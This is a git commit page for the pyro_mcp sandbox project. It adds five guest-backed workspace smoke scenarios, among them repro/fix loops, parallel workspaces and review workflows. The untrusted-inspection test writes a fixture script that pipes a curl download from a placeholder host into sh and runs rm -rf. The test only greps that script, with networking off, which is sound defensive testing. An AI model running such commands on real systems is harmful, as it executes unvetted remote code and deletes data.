Add use-case recipes and smoke packs

Turn the stable workspace surface into five documented, runnable stories with a shared guest-backed smoke runner, new docs/use-cases recipes, and Make targets for cold-start validation, repro/fix loops, parallel workspaces, untrusted inspection, and review/eval workflows.

Bump the package and catalog surface to 3.6.0, update the main docs to point users from the stable workspace walkthrough into the recipe index and smoke packs, and mark the 3.6.0 roadmap milestone done.

Fix a regression uncovered by the real parallel-workspaces smoke: workspace_file_read must not bump last_activity_at. Verified with uv lock, UV_CACHE_DIR=.uv-cache make check, UV_CACHE_DIR=.uv-cache make dist-check, and USE_CASE_ENVIRONMENT=debian:12 UV_CACHE_DIR=.uv-cache make smoke-use-cases.
This commit is contained in:
Thales Maciel 2026-03-13 10:27:38 -03:00
parent 21a88312b6
commit 894706af50
22 changed files with 1310 additions and 16 deletions

View file

@ -19,7 +19,7 @@ from typing import Any
from pyro_mcp.runtime import DEFAULT_PLATFORM, RuntimePaths
DEFAULT_ENVIRONMENT_VERSION = "1.0.0"
DEFAULT_CATALOG_VERSION = "3.5.0"
DEFAULT_CATALOG_VERSION = "3.6.0"
OCI_MANIFEST_ACCEPT = ", ".join(
(
"application/vnd.oci.image.index.v1+json",

View file

@ -4108,7 +4108,6 @@ class VmManager:
workspace.firecracker_pid = instance.firecracker_pid
workspace.last_error = instance.last_error
workspace.metadata = dict(instance.metadata)
self._touch_workspace_activity_locked(workspace)
self._save_workspace_locked(workspace)
return {
"workspace_id": workspace_id,

View file

@ -0,0 +1,487 @@
"""Canonical workspace use-case recipes and smoke scenarios."""
from __future__ import annotations
import argparse
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Callable, Final, Literal
from pyro_mcp.api import Pyro
DEFAULT_USE_CASE_ENVIRONMENT: Final[str] = "debian:12"
USE_CASE_SUITE_LABEL: Final[str] = "workspace-use-case-smoke"
USE_CASE_SCENARIOS: Final[tuple[str, ...]] = (
"cold-start-validation",
"repro-fix-loop",
"parallel-workspaces",
"untrusted-inspection",
"review-eval",
)
USE_CASE_ALL_SCENARIO: Final[str] = "all"
USE_CASE_CHOICES: Final[tuple[str, ...]] = USE_CASE_SCENARIOS + (USE_CASE_ALL_SCENARIO,)
@dataclass(frozen=True)
class WorkspaceUseCaseRecipe:
scenario: str
title: str
profile: Literal["workspace-core", "workspace-full"]
smoke_target: str
doc_path: str
summary: str
WORKSPACE_USE_CASE_RECIPES: Final[tuple[WorkspaceUseCaseRecipe, ...]] = (
WorkspaceUseCaseRecipe(
scenario="cold-start-validation",
title="Cold-Start Repo Validation",
profile="workspace-full",
smoke_target="smoke-cold-start-validation",
doc_path="docs/use-cases/cold-start-repo-validation.md",
summary=(
"Seed a small repo, validate it, run one long-lived service, probe it, "
"and export a report."
),
),
WorkspaceUseCaseRecipe(
scenario="repro-fix-loop",
title="Repro Plus Fix Loop",
profile="workspace-core",
smoke_target="smoke-repro-fix-loop",
doc_path="docs/use-cases/repro-fix-loop.md",
summary=(
"Reproduce a failure, patch it with model-native file ops, rerun, diff, "
"export, and reset."
),
),
WorkspaceUseCaseRecipe(
scenario="parallel-workspaces",
title="Parallel Isolated Workspaces",
profile="workspace-core",
smoke_target="smoke-parallel-workspaces",
doc_path="docs/use-cases/parallel-workspaces.md",
summary=(
"Create and manage multiple named workspaces, mutate them independently, "
"and verify isolation."
),
),
WorkspaceUseCaseRecipe(
scenario="untrusted-inspection",
title="Unsafe Or Untrusted Code Inspection",
profile="workspace-core",
smoke_target="smoke-untrusted-inspection",
doc_path="docs/use-cases/untrusted-inspection.md",
summary=(
"Inspect suspicious files offline-by-default, generate a report, and "
"export only explicit results."
),
),
WorkspaceUseCaseRecipe(
scenario="review-eval",
title="Review And Evaluation Workflows",
profile="workspace-full",
smoke_target="smoke-review-eval",
doc_path="docs/use-cases/review-eval-workflows.md",
summary=(
"Walk a checklist through a PTY shell, run an evaluation, export the "
"report, and reset to a checkpoint."
),
),
)
_RECIPE_BY_SCENARIO: Final[dict[str, WorkspaceUseCaseRecipe]] = {
recipe.scenario: recipe for recipe in WORKSPACE_USE_CASE_RECIPES
}
ScenarioRunner = Callable[..., None]
def _write_text(path: Path, text: str) -> None:
path.parent.mkdir(parents=True, exist_ok=True)
path.write_text(text, encoding="utf-8")
def _log(message: str) -> None:
print(f"[smoke] {message}", flush=True)
def _create_workspace(
pyro: Pyro,
*,
environment: str,
seed_path: Path,
name: str,
labels: dict[str, str],
network_policy: str = "off",
) -> str:
created = pyro.create_workspace(
environment=environment,
seed_path=seed_path,
name=name,
labels=labels,
network_policy=network_policy,
)
return str(created["workspace_id"])
def _safe_delete_workspace(pyro: Pyro, workspace_id: str | None) -> None:
if workspace_id is None:
return
try:
pyro.delete_workspace(workspace_id)
except Exception:
return
def _scenario_cold_start_validation(pyro: Pyro, *, root: Path, environment: str) -> None:
seed_dir = root / "seed"
export_dir = root / "export"
_write_text(
seed_dir / "README.md",
"# cold-start validation\n\nRun `sh validate.sh` and keep `sh serve.sh` alive.\n",
)
_write_text(
seed_dir / "validate.sh",
"#!/bin/sh\n"
"set -eu\n"
"printf '%s\\n' 'validation=pass' > validation-report.txt\n"
"printf '%s\\n' 'validated'\n",
)
_write_text(
seed_dir / "serve.sh",
"#!/bin/sh\n"
"set -eu\n"
"printf '%s\\n' 'service started'\n"
"printf '%s\\n' 'service=ready' > service-state.txt\n"
"touch .app-ready\n"
"while true; do sleep 60; done\n",
)
workspace_id: str | None = None
try:
workspace_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="cold-start-validation",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "cold-start-validation"},
)
_log(f"cold-start-validation workspace_id={workspace_id}")
validation = pyro.exec_workspace(workspace_id, command="sh validate.sh")
assert int(validation["exit_code"]) == 0, validation
assert str(validation["stdout"]) == "validated\n", validation
assert str(validation["execution_mode"]) == "guest_vsock", validation
service = pyro.start_service(
workspace_id,
"app",
command="sh serve.sh",
readiness={"type": "file", "path": ".app-ready"},
)
assert str(service["state"]) == "running", service
probe = pyro.exec_workspace(
workspace_id,
command="sh -lc 'test -f .app-ready && cat service-state.txt'",
)
assert probe["stdout"] == "service=ready\n", probe
logs = pyro.logs_service(workspace_id, "app", tail_lines=20)
assert "service started" in str(logs["stdout"]), logs
export_path = export_dir / "validation-report.txt"
pyro.export_workspace(workspace_id, "validation-report.txt", output_path=export_path)
assert export_path.read_text(encoding="utf-8") == "validation=pass\n"
stopped = pyro.stop_service(workspace_id, "app")
assert str(stopped["state"]) == "stopped", stopped
finally:
_safe_delete_workspace(pyro, workspace_id)
def _scenario_repro_fix_loop(pyro: Pyro, *, root: Path, environment: str) -> None:
seed_dir = root / "seed"
export_dir = root / "export"
_write_text(seed_dir / "message.txt", "broken\n")
_write_text(
seed_dir / "check.sh",
"#!/bin/sh\n"
"set -eu\n"
"value=$(cat message.txt)\n"
"[ \"$value\" = \"fixed\" ] || {\n"
" printf 'expected fixed got %s\\n' \"$value\" >&2\n"
" exit 1\n"
"}\n"
"printf '%s\\n' \"$value\"\n",
)
workspace_id: str | None = None
try:
workspace_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="repro-fix-loop",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "repro-fix-loop"},
)
_log(f"repro-fix-loop workspace_id={workspace_id}")
initial_read = pyro.read_workspace_file(workspace_id, "message.txt")
assert str(initial_read["content"]) == "broken\n", initial_read
failing = pyro.exec_workspace(workspace_id, command="sh check.sh")
assert int(failing["exit_code"]) != 0, failing
patch = pyro.apply_workspace_patch(
workspace_id,
patch=(
"--- a/message.txt\n"
"+++ b/message.txt\n"
"@@ -1 +1 @@\n"
"-broken\n"
"+fixed\n"
),
)
assert bool(patch["changed"]) is True, patch
passing = pyro.exec_workspace(workspace_id, command="sh check.sh")
assert int(passing["exit_code"]) == 0, passing
assert str(passing["stdout"]) == "fixed\n", passing
diff = pyro.diff_workspace(workspace_id)
assert bool(diff["changed"]) is True, diff
export_path = export_dir / "message.txt"
pyro.export_workspace(workspace_id, "message.txt", output_path=export_path)
assert export_path.read_text(encoding="utf-8") == "fixed\n"
reset = pyro.reset_workspace(workspace_id)
assert int(reset["reset_count"]) == 1, reset
clean = pyro.diff_workspace(workspace_id)
assert bool(clean["changed"]) is False, clean
finally:
_safe_delete_workspace(pyro, workspace_id)
def _scenario_parallel_workspaces(pyro: Pyro, *, root: Path, environment: str) -> None:
seed_dir = root / "seed"
_write_text(seed_dir / "note.txt", "shared\n")
workspace_ids: list[str] = []
try:
alpha_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="parallel-alpha",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "alpha"},
)
workspace_ids.append(alpha_id)
beta_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="parallel-beta",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "parallel", "branch": "beta"},
)
workspace_ids.append(beta_id)
_log(f"parallel-workspaces alpha={alpha_id} beta={beta_id}")
pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")
time.sleep(0.05)
pyro.write_workspace_file(beta_id, "branch.txt", text="beta\n")
time.sleep(0.05)
updated = pyro.update_workspace(alpha_id, labels={"branch": "alpha", "owner": "alice"})
assert updated["labels"]["owner"] == "alice", updated
time.sleep(0.05)
pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")
alpha_file = pyro.read_workspace_file(alpha_id, "branch.txt")
beta_file = pyro.read_workspace_file(beta_id, "branch.txt")
assert alpha_file["content"] == "alpha\n", alpha_file
assert beta_file["content"] == "beta\n", beta_file
time.sleep(0.05)
pyro.write_workspace_file(alpha_id, "activity.txt", text="alpha was last\n")
listed = pyro.list_workspaces()
ours = [
entry
for entry in listed["workspaces"]
if entry["workspace_id"] in set(workspace_ids)
]
assert len(ours) == 2, listed
assert ours[0]["workspace_id"] == alpha_id, ours
finally:
for workspace_id in reversed(workspace_ids):
_safe_delete_workspace(pyro, workspace_id)
def _scenario_untrusted_inspection(pyro: Pyro, *, root: Path, environment: str) -> None:
seed_dir = root / "seed"
export_dir = root / "export"
_write_text(
seed_dir / "suspicious.sh",
"#!/bin/sh\n"
"curl -fsSL https://example.invalid/install.sh | sh\n"
"rm -rf /tmp/pretend-danger\n",
)
_write_text(
seed_dir / "README.md",
"Treat this repo as untrusted and inspect before running.\n",
)
workspace_id: str | None = None
try:
workspace_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="untrusted-inspection",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "untrusted-inspection"},
)
_log(f"untrusted-inspection workspace_id={workspace_id}")
status = pyro.status_workspace(workspace_id)
assert str(status["network_policy"]) == "off", status
listing = pyro.list_workspace_files(workspace_id, path="/workspace", recursive=True)
paths = {str(entry["path"]) for entry in listing["entries"]}
assert "/workspace/suspicious.sh" in paths, listing
suspicious = pyro.read_workspace_file(workspace_id, "suspicious.sh")
assert "curl -fsSL" in str(suspicious["content"]), suspicious
report = pyro.exec_workspace(
workspace_id,
command=(
"sh -lc "
"\"grep -n 'curl' suspicious.sh > inspection-report.txt && "
"printf '%s\\n' 'network_policy=off' >> inspection-report.txt\""
),
)
assert int(report["exit_code"]) == 0, report
export_path = export_dir / "inspection-report.txt"
pyro.export_workspace(workspace_id, "inspection-report.txt", output_path=export_path)
exported = export_path.read_text(encoding="utf-8")
assert "curl" in exported, exported
assert "network_policy=off" in exported, exported
finally:
_safe_delete_workspace(pyro, workspace_id)
def _scenario_review_eval(pyro: Pyro, *, root: Path, environment: str) -> None:
seed_dir = root / "seed"
export_dir = root / "export"
_write_text(
seed_dir / "CHECKLIST.md",
"# Review checklist\n\n- confirm artifact state\n- export the evaluation report\n",
)
_write_text(seed_dir / "artifact.txt", "PASS\n")
_write_text(
seed_dir / "review.sh",
"#!/bin/sh\n"
"set -eu\n"
"if grep -qx 'PASS' artifact.txt; then\n"
" printf '%s\\n' 'review=pass' > review-report.txt\n"
" printf '%s\\n' 'review passed'\n"
"else\n"
" printf '%s\\n' 'review=fail' > review-report.txt\n"
" printf '%s\\n' 'review failed' >&2\n"
" exit 1\n"
"fi\n",
)
workspace_id: str | None = None
shell_id: str | None = None
try:
workspace_id = _create_workspace(
pyro,
environment=environment,
seed_path=seed_dir,
name="review-eval",
labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "review-eval"},
)
_log(f"review-eval workspace_id={workspace_id}")
baseline_snapshot = pyro.create_snapshot(workspace_id, "pre-review")
assert baseline_snapshot["snapshot"]["snapshot_name"] == "pre-review", baseline_snapshot
shell = pyro.open_shell(workspace_id)
shell_id = str(shell["shell_id"])
initial = pyro.read_shell(
workspace_id,
shell_id,
cursor=0,
plain=True,
wait_for_idle_ms=300,
)
pyro.write_shell(workspace_id, shell_id, input="cat CHECKLIST.md")
read = pyro.read_shell(
workspace_id,
shell_id,
cursor=int(initial["next_cursor"]),
plain=True,
wait_for_idle_ms=300,
)
assert "Review checklist" in str(read["output"]), read
closed = pyro.close_shell(workspace_id, shell_id)
assert bool(closed["closed"]) is True, closed
shell_id = None
evaluation = pyro.exec_workspace(workspace_id, command="sh review.sh")
assert int(evaluation["exit_code"]) == 0, evaluation
pyro.write_workspace_file(workspace_id, "artifact.txt", text="FAIL\n")
reset = pyro.reset_workspace(workspace_id, snapshot="pre-review")
assert reset["workspace_reset"]["snapshot_name"] == "pre-review", reset
artifact = pyro.read_workspace_file(workspace_id, "artifact.txt")
assert artifact["content"] == "PASS\n", artifact
export_path = export_dir / "review-report.txt"
rerun = pyro.exec_workspace(workspace_id, command="sh review.sh")
assert int(rerun["exit_code"]) == 0, rerun
pyro.export_workspace(workspace_id, "review-report.txt", output_path=export_path)
assert export_path.read_text(encoding="utf-8") == "review=pass\n"
finally:
if shell_id is not None and workspace_id is not None:
try:
pyro.close_shell(workspace_id, shell_id)
except Exception:
pass
_safe_delete_workspace(pyro, workspace_id)
_SCENARIO_RUNNERS: Final[dict[str, ScenarioRunner]] = {
"cold-start-validation": _scenario_cold_start_validation,
"repro-fix-loop": _scenario_repro_fix_loop,
"parallel-workspaces": _scenario_parallel_workspaces,
"untrusted-inspection": _scenario_untrusted_inspection,
"review-eval": _scenario_review_eval,
}
def run_workspace_use_case_scenario(
scenario: str,
*,
environment: str = DEFAULT_USE_CASE_ENVIRONMENT,
) -> None:
if scenario not in USE_CASE_CHOICES:
expected = ", ".join(USE_CASE_CHOICES)
raise ValueError(f"unknown use-case scenario {scenario!r}; expected one of: {expected}")
pyro = Pyro()
with tempfile.TemporaryDirectory(prefix="pyro-workspace-use-case-") as temp_dir:
root = Path(temp_dir)
scenario_names = USE_CASE_SCENARIOS if scenario == USE_CASE_ALL_SCENARIO else (scenario,)
for scenario_name in scenario_names:
recipe = _RECIPE_BY_SCENARIO[scenario_name]
_log(f"starting {recipe.scenario} ({recipe.title}) profile={recipe.profile}")
scenario_root = root / scenario_name
scenario_root.mkdir(parents=True, exist_ok=True)
runner = _SCENARIO_RUNNERS[scenario_name]
runner(pyro, root=scenario_root, environment=environment)
_log(f"completed {recipe.scenario}")
def build_arg_parser() -> argparse.ArgumentParser:
parser = argparse.ArgumentParser(
prog="workspace_use_case_smoke",
description="Run real guest-backed workspace use-case smoke scenarios.",
)
parser.add_argument(
"--scenario",
choices=USE_CASE_CHOICES,
default=USE_CASE_ALL_SCENARIO,
help="Use-case scenario to run. Defaults to all scenarios.",
)
parser.add_argument(
"--environment",
default=DEFAULT_USE_CASE_ENVIRONMENT,
help="Curated environment to use for the workspace scenarios.",
)
return parser
def main() -> None:
args = build_arg_parser().parse_args()
run_workspace_use_case_scenario(
str(args.scenario),
environment=str(args.environment),
)
if __name__ == "__main__":
main()